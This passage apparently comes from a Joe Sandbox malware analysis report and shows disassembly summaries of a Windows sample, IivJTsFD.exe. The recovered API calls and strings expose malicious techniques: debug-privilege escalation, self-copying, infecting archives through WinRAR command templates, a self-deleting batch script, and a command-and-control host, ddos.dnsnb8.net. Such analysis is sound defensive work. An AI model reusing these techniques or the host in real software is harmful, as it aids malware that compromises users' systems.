                              • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,00000104), ref: 0025166E
                              • CreateThread.KERNEL32(00000000,00000000,00251099,00000000,00000000,00000000), ref: 002516AC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 002516BD
                                • Part of subcall function 0025139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 002513BC
                                • Part of subcall function 0025139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002513DA
                                • Part of subcall function 0025139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00251448
                              • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 002516E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$C:\Windows\system32$Documents and Settings
                              • API String ID: 123563730-2678541693
                              • Opcode ID: 1cecdb27434db12cb6b2c9725a111cbad10d2fe12d9c5aebf36962d7c501a6d2
                              • Instruction ID: 7ce6d739f96629ded563319313f3e37b1aa49c99376dd4f05c45388c0af84028
                              • Opcode Fuzzy Hash: 1cecdb27434db12cb6b2c9725a111cbad10d2fe12d9c5aebf36962d7c501a6d2
                              • Instruction Fuzzy Hash: 9A11DA715613147BCB10ABA4BD4DFABBE6DEB163A7F000011FA09910E0C67045B8CBAD

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 205 251000-251023 CreateFileA 206 251025-251055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 251092-251096 205->207 208 251057-25105f 206->208 209 25107b-251085 206->209 212 251074-251075 UnmapViewOfFile 208->212 213 251061-25106e call 2517d0 208->213 210 251087-25108b CloseHandle 209->210 211 25108d-251091 CloseHandle 209->211 210->211 211->207 212->209 213->212
                              APIs
                              • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG%,http://%s:%d/%s/%s,002510E8,?), ref: 00251018
                              • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 00251029
                              • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00251038
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0025104B
                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00251075
                              • CloseHandle.KERNEL32(?), ref: 0025108B
                              • CloseHandle.KERNEL32(00000000), ref: 0025108E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                              • String ID: HG%$ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1223616889-3533919112
                              • Opcode ID: 1956122b2d4376ec1ccb8ea4e0fe97e46ffa064915f2270615ca1bb3f6e75342
                              • Instruction ID: e746b4313bdebd0a41f599e41634a4f710c4ddf5dfb2fabec4e3073f3e3f50c0
                              • Opcode Fuzzy Hash: 1956122b2d4376ec1ccb8ea4e0fe97e46ffa064915f2270615ca1bb3f6e75342
                              • Instruction Fuzzy Hash: 7401447150435DBFE731AF60AC8CF2BBBACDB447EAF004529FA45A21D0D6705E648B68

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 374 252c48-252c75 memset call 251973 377 252c77-252c7f 374->377 378 252cb2-252cb9 374->378 379 252c81-252c8b 377->379 380 252c8f-252cac CreateThread WaitForMultipleObjects 377->380 381 252cc8-252ccc 378->381 382 252cbb-252cc2 VirtualFree 378->382 379->380 380->378 382->381
                              APIs
                              • memset.MSVCRT ref: 00252C57
                                • Part of subcall function 00251973: PathFileExistsA.SHLWAPI(\N%`N%,00000000,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 00251992
                                • Part of subcall function 00251973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002519BA
                                • Part of subcall function 00251973: Sleep.KERNEL32(00000064), ref: 002519C6
                                • Part of subcall function 00251973: wsprintfA.USER32 ref: 002519EC
                                • Part of subcall function 00251973: CopyFileA.KERNEL32(?,?,00000000), ref: 00251A00
                                • Part of subcall function 00251973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00251A1E
                                • Part of subcall function 00251973: GetFileSize.KERNEL32(?,00000000), ref: 00251A2C
                                • Part of subcall function 00251973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00251A46
                                • Part of subcall function 00251973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00251A65
                              • CreateThread.KERNEL32(00000000,00000000,00252B8C,00000000,00000000,00000000), ref: 00252C99
                              • WaitForMultipleObjects.KERNEL32(00000001,002516BA,00000001,000000FF,?,002516BA,00000000), ref: 00252CAC
                              • VirtualFree.KERNEL32(01310000,00000000,00008000,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,00254E5C,00254E60,?,002516BA,00000000), ref: 00252CC2
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 00252C69
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                              • API String ID: 2042498389-1099539689
                              • Opcode ID: cf0488429f818d05a880bbc6d23ee7f50b60413b8d25dff325f48908d92701e4
                              • Instruction ID: 34d567398885fa33c1eb6f0eac86f89c1948ff1b5ffd72848de2037db32c196b
                              • Opcode Fuzzy Hash: cf0488429f818d05a880bbc6d23ee7f50b60413b8d25dff325f48908d92701e4
                              • Instruction Fuzzy Hash: AB018471651320BBD710EB95AC0EEDFBE6CEF02B67F504111BD05E61C2D5B09968C7A8

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 383 2514e1-2514fb 384 251541-251547 383->384 385 2514fd-251510 GetModuleHandleA 383->385 388 251573-251574 call 251638 384->388 389 251549-25154c 384->389 386 251512-251518 385->386 387 25151a-251535 VirtualQuery 385->387 386->384 390 251537-251539 387->390 391 25153b 387->391 396 251579-25157a ExitProcess 388->396 392 25154e-251555 389->392 393 251569-251570 389->393 390->384 390->391 391->384 392->393 395 251557-251566 call 251af9 392->395 395->393
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000), ref: 00251504
                              • VirtualQuery.KERNEL32(002514E1,?,0000001C), ref: 00251525
                              • ExitProcess.KERNEL32 ref: 0025157A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: ExitHandleModuleProcessQueryVirtual
                              • String ID:
                              • API String ID: 3946701194-0
                              • Opcode ID: 81b919c50477efa3b789b0d2519018b004a5d155bb76508473663aaa142e2e87
                              • Instruction ID: dbb5e28cbfb2c0fe4595fdc8aa05e9a87b04f54017b588b3a115eaddd4d5c30e
                              • Opcode Fuzzy Hash: 81b919c50477efa3b789b0d2519018b004a5d155bb76508473663aaa142e2e87
                              • Instruction Fuzzy Hash: D7117371911305DFCB11EF65B88977DB7BCEB84B67B10402AF802D6150E27089A5DB58

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 399 251915-251922 400 251924-251926 399->400 401 251928-25192c 399->401 402 25196e-251970 400->402 403 25194f-251952 401->403 404 25192e-25194d memset GetFileTime 401->404 403->402 406 251954-251960 SetFileTime 403->406 405 251966-251968 404->405 407 25196c 405->407 408 25196a 405->408 406->405 407->402 408->407
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: FileTimememset
                              • String ID:
                              • API String ID: 176422537-0
                              • Opcode ID: fdc8c46688d9f5678e45bc166fa361e0266aed6580a8c65c1a7cbde00e466762
                              • Instruction ID: 89775200bf63927a54fcb41e8885c639694b0ee43f89680f125f67da16a9f745
                              • Opcode Fuzzy Hash: fdc8c46688d9f5678e45bc166fa361e0266aed6580a8c65c1a7cbde00e466762
                              • Instruction Fuzzy Hash: C8F04432210349ABD720DE66DC04BA777ACAB50362F00853AF916D1090E770D66DCBA4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 409 256159-256189 VirtualFree 410 25618c-256192 409->410 411 2560c7-2560cf 410->411 412 256198-2561b0 VirtualFree 410->412 411->410 415 2560d5-2560f8 VirtualAlloc 411->415 413 2561b2-2561b4 412->413 414 2561ba-2561c8 412->414 413->414 416 256243-256251 414->416 417 2561ca-2561d7 414->417 432 2560fe-256106 415->432 433 2560fa-2560fc call 2566c8 415->433 419 256264-25626f 416->419 420 256253 416->420 421 2561dd-2561e0 417->421 425 256271-256276 419->425 424 256255-256258 420->424 421->416 426 2561e2-2561f2 421->426 424->419 428 25625a-256262 424->428 429 25627c-256289 425->429 430 256389-2563b1 VirtualProtect 425->430 431 2561f5-2561fe 426->431 428->424 451 256292-256298 429->451 452 25628b 429->452 436 2563b7-2563ba 430->436 434 256200-256203 431->434 435 25620c-256219 431->435 438 256155-256189 VirtualFree 432->438 439 256108-25611d 432->439 433->432 441 256205-256208 434->441 442 25621b-256228 434->442 443 256238-25623f 435->443 444 2563fc-2563ff VirtualProtect 436->444 445 2563bc-2563c2 436->445 438->410 449 25611f-256121 439->449 453 25622a-256236 441->453 454 25620a 441->454 442->443 443->431 448 256241 443->448 450 256400-256416 444->450 445->445 446 2563c4 445->446 446->444 455 2563c6-2563cf 446->455 448->421 456 256151-256154 449->456 457 256123 449->457 458 256420-256425 450->458 459 256418-25641d 450->459 460 2562a2-2562ac 451->460 452->451 453->443 454->443 461 2563d4-2563d8 455->461 462 2563d1 455->462 456->438 457->456 463 256125-256128 457->463 464 2562b1-2562c8 460->464 465 2562ae 460->465 468 2563dd-2563e1 461->468 469 2563da 461->469 462->461 470 256134-25613b 463->470 471 25612a-25612e 463->471 466 256373-256384 464->466 467 2562ce-2562d4 464->467 465->464 466->425 472 2562d6-2562d9 467->472 473 2562da-2562f1 467->473 474 2563e7-2563fa VirtualProtect 468->474 475 2563e3 468->475 469->468 478 256130-256132 470->478 479 25613d-25614f 470->479 471->470 471->478 472->473 481 256365-25636e 473->481 482 2562f3-2562f9 473->482 474->436 474->444 475->474 478->449 479->449 481->460 483 256314-256326 482->483 484 2562fb-25630f 482->484 486 25634c-256360 483->486 487 256328-25634a 483->487 485 256426-2564a9 484->485 496 256519-25651c 485->496 497 2564ab-2564c0 485->497 486->485 487->481 498 256583-256587 496->498 499 25651d-25651e 496->499 503 256535-256537 497->503 504 2564c2 497->504 501 256588-25658b 498->501 502 256522-256533 499->502 505 2565a1-2565a3 501->505 506 25658d-25658f 501->506 502->503 507 256539 503->507 508 25659a 503->508 509 2564c5-2564cd 504->509 510 2564f8 504->510 513 256591-256593 506->513 514 2565b4 507->514 515 25653b-256541 507->515 516 25659b-25659d 508->516 517 256542-256545 509->517 518 2564cf-2564d4 509->518 511 25656c-25656f 510->511 512 2564fa-2564fe 510->512 524 256572 511->524 512->524 525 256500 512->525 513->516 526 256595 513->526 523 2565be-256608 514->523 515->517 516->513 519 25659f 516->519 520 25654d-256550 517->520 521 256517-256518 518->521 522 2564d6-2564d9 518->522 519->501 520->523 527 256552-256556 520->527 521->496 522->520 528 2564db-2564f5 522->528 529 256573-256576 524->529 525->502 530 256502 525->530 526->508 531 256578-25657f 527->531 532 256558-256569 527->532 528->510 529->531 530->529 533 256504-256513 530->533 531->498 532->511 533->503 535 256515 533->535 535->521
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 002560DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00256189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 002561A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: Virtual$Free$Alloc
                              • String ID:
                              • API String ID: 1852963964-0
                              • Opcode ID: c4abdfdfe6dabdcb7f6596257cc28f93221043cc0ca92a868a2ca5549ad778b4
                              • Instruction ID: acd1a0bc0822bbd67bf698448c53c0433187460f0748d6a448d0b0ebfb5244b6
                              • Opcode Fuzzy Hash: c4abdfdfe6dabdcb7f6596257cc28f93221043cc0ca92a868a2ca5549ad778b4
                              • Instruction Fuzzy Hash: 68118F3161064ACFCF318F58CC897ED37A1FF44302FA94018DD8D9B691DAB56968CB98
                              APIs
                              • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,?,?,002513EF), ref: 002511AB
                              • OpenProcessToken.ADVAPI32(00000000,00000028,002513EF,?,?,?,?,?,?,002513EF), ref: 002511BB
                              • AdjustTokenPrivileges.ADVAPI32(002513EF,00000000,?,00000010,00000000,00000000), ref: 002511EB
                              • CloseHandle.KERNEL32(002513EF), ref: 002511FA
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,002513EF), ref: 00251203
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 002511A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                              • String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
                              • API String ID: 75692138-1099539689
                              • Opcode ID: 7184b45555dd2616da83672e6d2d28045b3504028ddb6c5a933628d89db3c660
                              • Instruction ID: d65f59955f39a358518d8e61d0580f474339febdbbd27373ab20f9ffea464f15
                              • Opcode Fuzzy Hash: 7184b45555dd2616da83672e6d2d28045b3504028ddb6c5a933628d89db3c660
                              • Instruction Fuzzy Hash: 5C01E4B5900309EFDB00DFE4DD89AAEBBB8FB04346F504469E606A2290D7719F589B64
                              APIs
                              • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 002513BC
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002513DA
                              • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00251448
                                • Part of subcall function 0025119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,?,?,002513EF), ref: 002511AB
                                • Part of subcall function 0025119F: OpenProcessToken.ADVAPI32(00000000,00000028,002513EF,?,?,?,?,?,?,002513EF), ref: 002511BB
                                • Part of subcall function 0025119F: AdjustTokenPrivileges.ADVAPI32(002513EF,00000000,?,00000010,00000000,00000000), ref: 002511EB
                                • Part of subcall function 0025119F: CloseHandle.KERNEL32(002513EF), ref: 002511FA
                                • Part of subcall function 0025119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,002513EF), ref: 00251203
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 002513A8
                              • SeDebugPrivilege, xrefs: 002513D3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                              • String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$SeDebugPrivilege
                              • API String ID: 4123949106-120938002
                              • Opcode ID: b55cb7cb15a654097943e39d5523a389a1bb5b2dce22168010d0f2636db30ad3
                              • Instruction ID: 2b33ae3b542127ee117cb2dc53d1c405ad783ce22f965cd9fc493afbab0d6a80
                              • Opcode Fuzzy Hash: b55cb7cb15a654097943e39d5523a389a1bb5b2dce22168010d0f2636db30ad3
                              • Instruction Fuzzy Hash: C9316271D5020AEADF20DFA5CC45FEEBBB8EB44706F2040A9E904B2141E7709E69CF64
                              APIs
                              • strstr.MSVCRT ref: 002523CC
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00252464
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00252472
                              • CloseHandle.KERNEL32(?,00000000,00000000), ref: 002524A8
                              • memset.MSVCRT ref: 002524B9
                              • strrchr.MSVCRT ref: 002524C9
                              • wsprintfA.USER32 ref: 002524DE
                              • strrchr.MSVCRT ref: 002524ED
                              • memset.MSVCRT ref: 002524F2
                              • memset.MSVCRT ref: 00252505
                              • wsprintfA.USER32 ref: 00252524
                              • Sleep.KERNEL32(000007D0), ref: 00252535
                              • Sleep.KERNEL32(000007D0), ref: 0025255D
                              • memset.MSVCRT ref: 0025256E
                              • wsprintfA.USER32 ref: 00252585
                              • memset.MSVCRT ref: 002525A6
                              • wsprintfA.USER32 ref: 002525CA
                              • Sleep.KERNEL32(000007D0), ref: 002525D0
                              • Sleep.KERNEL32(000007D0,?,?), ref: 002525E5
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002525FC
                              • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00252611
                              • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00252642
                              • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0025265B
                              • SetEndOfFile.KERNEL32 ref: 0025266D
                              • CloseHandle.KERNEL32(00000000), ref: 00252676
                              • RemoveDirectoryA.KERNEL32(?), ref: 00252681
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                              • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2203340711-2169341206
                              • Opcode ID: cb4c2c90ceef5fb8be7094fdf274270f8c5ac5e6cba3d5d487e99f72eb660554
                              • Instruction ID: b09511d0b64f0fcd0c36065dc25e124468c927fbab1653bcf9d1ed01041b9eb2
                              • Opcode Fuzzy Hash: cb4c2c90ceef5fb8be7094fdf274270f8c5ac5e6cba3d5d487e99f72eb660554
                              • Instruction Fuzzy Hash: FB81D0B1514344ABD710EF60EC49FABB7ACEB85756F00051AFA44D21D0D770DA9C8B6A
                              APIs
                              • memset.MSVCRT ref: 00252766
                              • memset.MSVCRT ref: 00252774
                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00252787
                              • wsprintfA.USER32 ref: 002527AB
                                • Part of subcall function 0025185B: GetSystemTimeAsFileTime.KERNEL32(00251F92,00000000,?,00000000,?,?,?,00251F92,?,00000000,00000002), ref: 00251867
                                • Part of subcall function 0025185B: srand.MSVCRT ref: 00251878
                                • Part of subcall function 0025185B: rand.MSVCRT ref: 00251880
                                • Part of subcall function 0025185B: srand.MSVCRT ref: 00251890
                                • Part of subcall function 0025185B: rand.MSVCRT ref: 00251894
                              • wsprintfA.USER32 ref: 002527C6
                              • CopyFileA.KERNEL32(?,00254C80,00000000), ref: 002527D4
                              • wsprintfA.USER32 ref: 002527F4
                                • Part of subcall function 00251973: PathFileExistsA.SHLWAPI(\N%`N%,00000000,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 00251992
                                • Part of subcall function 00251973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002519BA
                                • Part of subcall function 00251973: Sleep.KERNEL32(00000064), ref: 002519C6
                                • Part of subcall function 00251973: wsprintfA.USER32 ref: 002519EC
                                • Part of subcall function 00251973: CopyFileA.KERNEL32(?,?,00000000), ref: 00251A00
                                • Part of subcall function 00251973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00251A1E
                                • Part of subcall function 00251973: GetFileSize.KERNEL32(?,00000000), ref: 00251A2C
                                • Part of subcall function 00251973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00251A46
                                • Part of subcall function 00251973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00251A65
                              • DeleteFileA.KERNEL32(?,?,00254E54,00254E58), ref: 0025281A
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00254E54,00254E58), ref: 00252832
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                              • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                              • API String ID: 692489704-3961832207
                              • Opcode ID: eb0e739a0c7a902314a1c8fdcc54a860fefdb11f3fcd8dbedecc44bc41a9a47d
                              • Instruction ID: 465b6fc65c58c1a8a5c9c40f204ce60e2617430017e6f4f1e2a046f37ea90ff4
                              • Opcode Fuzzy Hash: eb0e739a0c7a902314a1c8fdcc54a860fefdb11f3fcd8dbedecc44bc41a9a47d
                              • Instruction Fuzzy Hash: 332168B6D5031C7BDB10E7A49C89FDB736CEB0574AF4015A1BE44E2081E670DFAC4A68
                              APIs
                                • Part of subcall function 0025185B: GetSystemTimeAsFileTime.KERNEL32(00251F92,00000000,?,00000000,?,?,?,00251F92,?,00000000,00000002), ref: 00251867
                                • Part of subcall function 0025185B: srand.MSVCRT ref: 00251878
                                • Part of subcall function 0025185B: rand.MSVCRT ref: 00251880
                                • Part of subcall function 0025185B: srand.MSVCRT ref: 00251890
                                • Part of subcall function 0025185B: rand.MSVCRT ref: 00251894
                              • wsprintfA.USER32 ref: 002515AA
                              • wsprintfA.USER32 ref: 002515C6
                              • lstrlen.KERNEL32(?), ref: 002515D2
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 002515EE
                              • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00251609
                              • CloseHandle.KERNEL32(00000000), ref: 00251612
                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0025162D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                              • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$open
                              • API String ID: 617340118-3916927215
                              • Opcode ID: e29d1019d75a3ef2b9aaa5361f13083ea9f3bd8b989445bfb0f3acbc3aab1389
                              • Instruction ID: c0d656f9daa6d08b6dd811699464a1cf919d79bfa35baae8ff537d882f5bf6ec
